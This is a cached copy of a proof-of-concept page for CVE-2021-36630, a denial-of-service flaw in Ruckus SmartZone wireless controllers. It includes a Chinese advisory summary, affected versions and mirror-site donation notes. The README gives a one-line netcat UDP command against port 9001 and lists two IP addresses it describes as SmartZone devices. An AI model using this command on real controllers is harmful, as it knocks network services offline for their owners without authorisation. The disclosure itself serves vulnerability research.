CVE-2021-36630 PoC — Ruckus Wireless SmartZone 安全漏洞

Source

https://github.com/lixiang957/CVE-2021-36630

Associated Vulnerability

Title:Ruckus Wireless SmartZone 安全漏洞 (CVE-2021-36630)
Description:Ruckus Wireless SmartZone是Ruckus公司的高性能WLAN控制器。 Ruckus Wireless SmartZone存在安全漏洞，该漏洞源于eAut模块中发现包含分布式拒绝服务攻击漏洞。攻击者利用该漏洞通过特制的请求执行拒绝服务攻击。

Readme

# CVE-2021-36630

The SmartZone series devices of Ruckus have security risks. After notifying the manufacturer, they actively organized technical personnel to conduct investigations. During this period, we also provided security suggestions and verification methods many times. On July 19, the company officially issued a safety announcement.

# send request

> Attack command: echo "" | nc -4u <ip:address> 9001
> 
> ipaddress example: 62.210.8.110?111.107.251.71(RuckusWireless SZ ip)
> 

# example
![test](./Images/img.png)


# Affected version
> SmartZone-100 - all
> all - Virtual SmartZone

# Reference link

> http://ruckus.com
> http://smartzone-100.com
> https://anquan.baidu.com/article/1434

File Snapshot


 [4.0K]  /data/pocs/78e81ae82c17bbe1957696b1e71afbdac07d4d7b
├── [4.0K]  Images
│   └── [ 59K]  img.png
└── [ 701]  README.md

1 directory, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!